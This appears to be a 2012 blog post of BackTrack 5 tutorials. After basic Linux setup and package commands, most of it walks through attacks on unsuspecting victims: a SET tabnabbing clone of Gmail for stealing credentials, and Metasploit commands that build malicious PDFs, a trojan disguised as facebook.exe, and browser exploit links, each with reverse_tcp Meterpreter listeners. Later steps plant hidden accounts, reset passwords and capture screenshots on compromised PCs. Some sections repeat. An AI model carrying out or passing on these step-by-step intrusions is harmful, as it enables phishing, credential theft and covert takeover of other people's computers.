How to Login in BackTrack

Once the installation of BackTrack is done, the default username and password required to log in are root / toor

How to Open GUI Environment BackTrack

After you are logged in you can start the GUI Environment by issuing the startx command

How to check IP address

root@bt:~# ifconfig

How to Setup IP Address Manually

root@bt:~# ifconfig eth0 192.168.1.8

root@bt:~# route add default gw 192.168.1.1

root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

How to Change the Root Password

root@bt:~# passwd Enter new UNIX password: {enter your new password here}

Retype new UNIX password: {enter your new password again}

passwd: password updated successfully

root@bt:~#

How to start services

root@bt:~# /etc/init.d/openvpn start

Starting Virtual private network daemon(s)…

root@bt:~# /etc/init.d/openvpn stop

How to check kernel version

Use the uname -a as show below

Common Apt Commands

apt-get install <package> Downloads <package> and all of its dependencies, and installs or upgrades them.

apt-get remove [--purge] <package> Removes <package> and any packages that depend on it. –purge specifies that packages should be purged.

apt-get update Updates packages listings from the repo, should be run at least once a week.

apt-get upgrade Upgrades all currently installed packages with those updates available from the repo. should be run once a week.

apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.

apt-cache search <pattern> Searches packages and descriptions for <pattern>.

apt-cache show <package> Shows the full description of <package>.

apt-cache showpkg <package> Shows a lot more detail about <package>, and its relationships to other packages.

man apt Will give you more info on these commands as well as many that are in less common usage.

Common dpkg commands

dpkg -i <package.deb> Installs a package file; one that you downloaded manually, for example.

dpkg -c <package.deb> Lists the contents of <package.deb> a .deb file.

dpkg -I <package.deb> Extracts package information from <package.deb> a .deb file.

dpkg -r <package> Removes an installed package named <package>

dpkg -P <package> Purges an installed package named <package>. The difference between remove and purge is that while remove only deletes data and executables, purge also deletes all configuration files in addition.

dpkg -L <package> Gives a listing of all the files installed by <package>. See also dpkg -c for checking the contents of a .deb file.

dpkg -s <package> Shows information on the installed package <package>. See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.

dpkg-reconfigure <package> Reconfigures an installed package

man dpkg Will give you more info on these commands as well as many that are in less common usage.

How to Hack Gmail, Facebook with BT 5

First open your backtrack terminal and type ifconfig to check your IP

Now Again Open Your Backtrack terminal and Type cd /pentest/exploits/set
Now Open Social Engineering Toolkit (SET) ./set

Now choose option 2, “Website Attack Vectors”.

In this option we will select option 4 “Tabnabbing Attack Method”.

In this option we will choose option 2 “Site Cloner”.

Enter the URL of the site you want to clone. In this case http://www.gmail.com and hit enter. SET will clone up the web site. And press return to continue.

Now convert your URL into Google URL using goo.gl and send this link address to your victim via Email or Chat.

When victim open in their browser it should be a message that the page is still loading. so victim start to open another tab. As soon as victim open new tab, our fake website start working. That script will redirect the victim to the phishing page your derived.

Metasploit Tutorial for Beginners (Part 1)

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Metasploit helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments.

Download Metasploit for Windows user
Download Metasploit for Linux user

Minimum System Requirements:

2 GHz+ processor
2 GB RAM available (4 GB recommended, increase accordingly with VM targets on the same device)
500MB+ available disk space
10/100 Mbps network interface card

Supported Operating Systems:

Windows XP, 2003, Vista, 2008 Server, and Windows 7
Red Hat Enterprise Linux 5.x, 6.x – x86 and x86_64
Ubuntu Linux 8.04, 10.04 – x86 and x86_64

Required Browser Versions

Mozilla Firefox 4.0+
Microsoft Internet Explorer 9
Google Chrome 10+

Basics Terms of Metasploit

Vulnerability: Vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system. Vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.

Exploit: “Exploit” refers to a well-known bug/hole that hackers can use to gain entry into the system.To take advantage of vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system.

Payload: A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit.

Metasploit Basic Command Tutorial

Msfconsole

Help

Help: it will show you the basic commands of Metasploit.

Show payloads

Show payloads: it will show you all the available payloads on Metasploit.

Show exploits

Show exploits: it will show you all exploits in Metasploit.

msf> use <exploit>	to use a exploit or payload
msf exploit (name)> set payload <paload name>	To add specified payload
msf exploit (name)> set rhost <victim ip>	To add victim ip address to specified exploit#
msf exploit (name)> set lhost <localhost ip>	To add attacker ip address to specified exploit#
msf exploit (name)> unset rhost	To remove rhost value
msf exploit (name)> unset lhost	To remove lhost value
msf exploit (name)> setg rhost <victim ip>	To add victim ip address globally
msf exploit (name)> setg lhost <localhost>	To add localhost(attacker) ip address globally
msf exploit (name)> sessions -l -v	To see list of sessions

Meterpreter Basic Commands

Help

The ‘help’ command, as may be expected, displays the Meterpreter help menu.

PS

The ‘ps’ command displays a list of running processes on the target.

LS

As in Linux, the ‘ls’ command will list the files in the current remote directory.

Ipconfig

The ‘ipconfig’ command displays the network interfaces and addresses on the remote machine.

Getuid

Running ‘getuid’ will display the user that the Meterpreter server is running as on the host.

Download

The ‘download’ command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.

Upload

As with the ‘download’ command, you need to use double-slashes with the ‘upload’ command.

Shell

The ‘shell’ command will present you with a standard shell on the target system.

How to Hack Remote PC using PDF

Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.

Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)

Requirement

Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/adobe_flatedecode_predictor02
Msf exploit (adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_flatedecode_predictor02)>show options

Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf
Msf exploit (adobe_flatedecode_predictor02)>exploit
After we successfully generate the malicious PDF, it will stored on your local computer
/root/.msf4/local/attack.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send your attack.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Hack Remote PC using Payload in BackTrack 5

Open Your Backtrack terminal and Type cd /pentest/exploits/set
Now Open Social Engineering Toolkit (SET) ./set

Now choose option 1, “Social-Engineering Attacks”

Now choose option 4, “Create Payload and Listener”

Now choose 2 “Windows Reverse_TCP Meterpreter”, but you have several to choose from including your own program.

Now choose 2 “shikata-ga-nai”

Now choose a port for the listener, choose a random port 443 and then I choose Yes on starting a listener.

Now a file name msf.exe has been created, you can get the file by going on file system–>pentest>exploit–>set–>msf.exe

Now rename the file anything you want. In my case I am renaming it facebook.exe

Now upload your exe on file sharing website like filesonic, rapidshare, and megaupload. In my case I am using 4shared.com now send link to the victim.

As soon as our victim downloads and executes our facebook.exe, now you have access to the victims PC

Use “Sessions -l” and the Session number to connect to the session. Now Type “session s -i ID“.

How to Hack Remote PC using PDF

Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.

Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)

Requirement

Now send your attack.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

How to Extract Email Address of Domain using Metasploit

First open your backtrack terminal and type msfconsole

Now type search collector

Now type use auxiliary/gather/search_email_collector
Than type show options

The next step you need to set up the domain you want to locate the email address. Now type set domain (www.example.com)

When we finished setup the domain, the default searching engine that will be use for this searching are Google, Bing, and Yahoo.

How to Create hidden user in Remote PC

Step1: First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)
Step2: Type shell to get the access of command prompt of victim pc
Step3: type net user rajchandel (New user) /add to create a new account on the victim pc
Step4: net user rajchandel (User Name) /active:no to disable the user account press enter
Step5: net user rajchandel (User Name) hacking (password) press enter

Now you can check account is disable or not type net user (user name)

How to Create hidden user in Remote PC

How to capture Screenshot of Remote PC with Metaspolit

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)
Run ps command to view all active process

Find Process ID for Explorer.exe. in my case victim Explorer.exe process ID is 1436 now type migrate 1436
After successfully migrate to Explorer.exe process, now type “use espia” to enable capture on victim screen.

Type screengrab to start capturing victim screenshot and the image will be saved on your on your Desktop.

How to change password of Remote PC in LAN

Step1: First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)
Step2: in meterpreter Type shell to get the access of command prompt of victim pc
Step3: type net user displays a list of the user accounts on the victim pc

Step4: net user administrator (User Name) raj (password) press enter

How to Hack Remote PC using Foxit Reader

This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field. This results in overwriting a structured exception handler record. NOTE: This exploit does not use JavaScript.

Exploit Targets

Foxit Reader v4.1.1 X

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/foxit_title_bof

Msf exploit (foxit_title_bof)>set payload windows/meterpreter/reverse_tcp

Msf exploit (foxit_title_bof)> set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (foxit_title_bof)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer
/root/.msf4/local/corelan_foxit.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.2

exploit

Now send your corelan_foxit.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Hack Remote XP using Heap Overflow Attack

This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ms12_004_midi

Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms12_004_midi)>set lport 4444 (Port of Local PC)

Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)

Msf exploit (ms12_004_midi)>exploit

Now an URL you should give to your victim http://192.168.1.4:80/salesreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote Windows 7 PC Using UltraVNC Buffer Overflow Attack

This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack

Exploit Targets

0 – Windows XP SP3 (default)

1-Windows XP SP2

2-Windows 7

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/vnc/ultravnc_bof

Msf exploit (ultravnc_bof)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ultravnc_bof)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ultravnc_bof)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ultravnc_bof)>exploit

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Exploit Targets

0 – Automatic (default)

1 – Internet Explorer 8

2 – Internet Explorer 7

3 – Internet Explorer 6

4 – Debug Target (Crash)

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ms11_003_ie_css_import

Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms11_003_ie_css_import)>set uripath newhackingvideos.avi (The Url to use for this exploit)

Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms11_003_ie_css_import)>exploit

Now an URL you should give to your victim http://192.168.1.4:80/newhackingvideos.avi

Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

How to Attack on Remote Windows PC using Winzip

WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow

The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a remote attacker to execute arbitrary code on the system. The control contains several unsafe methods and is marked safe for scripting and safe for initialization. A remote attacker could exploit this vulnerability to execute arbitrary code on the victim system. WinZip 10.0 <= Build 6667 are vulnerable.

Exploit Targets

Windows XP

Winzip 10.0

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/winzip_fileview

Msf exploit (winzip_fileview)>set payload windows/meterpreter/reverse_tcp

Msf exploit (winzip_fileview) set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (winzip_fileview)>set uripath zip (The Url to use for this exploit)

Msf exploit (winzip_fileview)>exploit

Now an URL you should give to your victim http://192.168.1.3:8080/zip

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

How to Attack on Remote PC using HTTP Code Injection Technique

First Install subterfuge Toolkit in Backtrack
You can view the Tutorial Here
Open your backtrack terminal and type subterfuge

Now start a Web browser and navigate to http://127.0.0.1:80/
After a few seconds, you’ll see the main subterfuge GUI displayed.
Click on HTTP Code Injection

Click on Custom Inject and Click Apply

Msf auxiliary (browser_autopwn)>set lhost 192.168.1.3 (IP Address of your PC)

Msf auxiliary (browser_autopwn)>exploit

Now an URL you should give to your victim http://192.168.1.3:8080/
Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Saturday, 2 June 2012

BackTrack 5 Tutorials

How to Hack Gmail, Facebook with BT 5

Metasploit Tutorial for Beginners (Part 1)

Basics Terms of Metasploit

Metasploit Basic Command Tutorial

Msfconsole

Help

Show payloads

Show exploits

Meterpreter Basic Commands

Help

PS

LS

Ipconfig

Getuid

Download

Upload

Shell

How to Hack Remote PC using PDF

Adobe FlateDecode Stream Predictor 02 Integer Overflow

Exploit Targets

Requirement

Hack Remote PC using Payload in BackTrack 5

How to Hack Remote PC using PDF

Adobe FlateDecode Stream Predictor 02 Integer Overflow

Exploit Targets

Requirement

How to Extract Email Address of Domain using Metasploit

How to Create hidden user in Remote PC

How to Create hidden user in Remote PC

How to Create hidden user in Remote PC

How to Create hidden user in Remote PC

How to Create hidden user in Remote PC

How to capture Screenshot of Remote PC with Metaspolit

How to change password of Remote PC in LAN

How to Hack Remote PC using Foxit Reader

Exploit Targets

Requirement

Hack Remote XP using Heap Overflow Attack

Exploit Targets

Requirement

Hack Remote Windows 7 PC Using UltraVNC Buffer Overflow Attack

Exploit Targets

Requirement

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

Exploit Targets

Requirement

How to Attack on Remote Windows PC using Winzip

WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow

Exploit Targets

Requirement

How to Attack on Remote PC using HTTP Code Injection Technique

Recommended links by ehacker007

4 comments: